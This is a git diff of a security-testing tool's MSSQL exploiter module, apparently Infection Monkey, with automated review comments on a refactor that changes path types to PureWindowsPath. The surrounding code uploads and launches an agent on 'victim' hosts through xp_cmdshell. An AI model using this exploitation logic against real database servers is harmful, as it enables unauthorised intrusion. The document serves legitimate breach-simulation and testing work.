diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py
index 453e875ca..4f9608acb 100644
--- a/monkey/infection_monkey/exploit/mssqlexec.py
+++ b/monkey/infection_monkey/exploit/mssqlexec.py
@@ -1,6 +1,5 @@
 import logging
-import os
-from pathlib import PurePath
+from pathlib import PureWindowsPath
 from time import sleep
 import pymssql
@@ -31,7 +30,7 @@ class MSSQLExploiter(HostExploiter):
 # Temporary file that saves commands for monkey's download and execution.
 TMP_FILE_NAME = "tmp_monkey.bat"
- TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
+ TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
 MAX_XP_CMDSHELL_COMMAND_SIZE = 12800
@@ -49,9 +48,7 @@ class MSSQLExploiter(HostExploiter):
 super().__init__()
 self.cursor = None
 self.agent_http_path = None
- self.payload_file_path = os.path.join(
- MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
- )
+ self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME
 def _exploit_host(self) -> ExploiterResultData:
 """
@@ -109,7 +106,7 @@ class MSSQLExploiter(HostExploiter):
 return self.exploit_result
 def run_payload_file(self):
- file_running_command = MSSQLLimitedSizePayload(self.payload_file_path)
+ file_running_command = MSSQLLimitedSizePayload(str(self.payload_file_path))
 return self.run_mssql_command(file_running_command)
 def create_temp_dir(self):
@@ -133,7 +130,7 @@ class MSSQLExploiter(HostExploiter):
 raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
 self.run_mssql_commands(array_of_commands)
- def run_monkey(self, monkey_path_on_victim: PurePath):
+ def run_monkey(self, monkey_path_on_victim: PureWindowsPath):
 monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
 logger.debug(
 f"Launching the agent: {monkey_launch_command.prefix} -- "
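Review bot: In the `@@ -31,7 +30,7 @@` hunk, `TMP_DIR_PATH` changes type from `str` to `PureWindowsPath` while its neighbour `TMP_FILE_NAME` stays a `str`, and nothing on the line records that. Any use outside these hunks that joins `TMP_DIR_PATH` to a string with `+` would now raise `TypeError`; the commands that create and remove the directory are not visible here, so those call sites are worth checking. I would add a comment above the assignment such as `# Relative PureWindowsPath; "%temp%" stays literal in Python and is presumably expanded by the shell on the target.` The class body continues outside the hunk.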
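Review bot: `self.payload_file_path` in the `@@ -49,9 +48,7 @@` hunk is now a `PureWindowsPath`, so each consumer has to convert it, and the commit does that by hand in `run_payload_file` (`@@ -109,7 +106,7 @@`) with `str(self.payload_file_path)`. Conversions scattered over call sites are easy to miss when another consumer is added; annotating the attribute, `self.payload_file_path: PureWindowsPath = self.TMP_DIR_PATH / self.TMP_FILE_NAME`, makes the type visible to a checker and keeps the line within the file's apparent length limit. Whether `MSSQLLimitedSizePayload` would accept a path object directly cannot be told from this page. `__init__` starts before the hunk.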
@@ -148,7 +145,7 @@ class MSSQLExploiter(HostExploiter):
 self.cursor.execute(cmd)
 sleep(MSSQLExploiter.QUERY_BUFFER)
- def upload_monkey(self, monkey_path_on_victim: PurePath):
+ def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
 monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
 self.run_payload_file()
 self.add_executed_cmd(monkey_download_command.command)
@@ -164,7 +161,7 @@ class MSSQLExploiter(HostExploiter):
 )
 self.run_mssql_command(tmp_dir_removal_command)
- def start_monkey_server(self, monkey_path_on_victim: PurePath) -> LockedHTTPServer:
+ def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
 self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
 self.host, str(monkey_path_on_victim), self.agent_repository
 )
@@ -175,12 +172,12 @@ class MSSQLExploiter(HostExploiter):
 http_thread.stop()
 http_thread.join(LONG_REQUEST_TIMEOUT)
- def write_download_command_to_payload(self, monkey_path_on_victim: PurePath):
+ def write_download_command_to_payload(self, monkey_path_on_victim: PureWindowsPath):
 monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
 self.run_mssql_command(monkey_download_command)
 return monkey_download_command
- def get_monkey_launch_command(self, monkey_path_on_victim: PurePath):
+ def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
 # Form monkey's launch command
 monkey_args = build_monkey_commandline(
 self.host, self.current_depth - 1, monkey_path_on_victim
@@ -193,7 +190,7 @@ class MSSQLExploiter(HostExploiter):
 suffix=suffix,
 )
- def get_monkey_download_command(self, monkey_path_on_victim: PurePath):
+ def get_monkey_download_command(self, monkey_path_on_victim: PureWindowsPath):
 monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
 http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
 )
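Review bot: The path argument is converted inconsistently across these hunks: `start_monkey_server` (`@@ -164,7 +161,7 @@`) and `get_monkey_download_command` (`@@ -193,7 +190,7 @@`) wrap it in `str(...)`, while `get_monkey_launch_command` in `@@ -175,12 +172,12 @@` passes the `PureWindowsPath` object straight to `build_monkey_commandline`. That helper is not visible here and may well accept a path; if it expects a string, the argument line should read `self.host, self.current_depth - 1, str(monkey_path_on_victim)`. The narrowed annotation is also the only statement of the contract, since none of the touched methods has a docstring; a one-line docstring on each saying that `monkey_path_on_victim` is the agent's destination path on the Windows target would make the requirement explicit. The bodies of `get_monkey_launch_command` and `get_monkey_download_command` run past the end of their hunks.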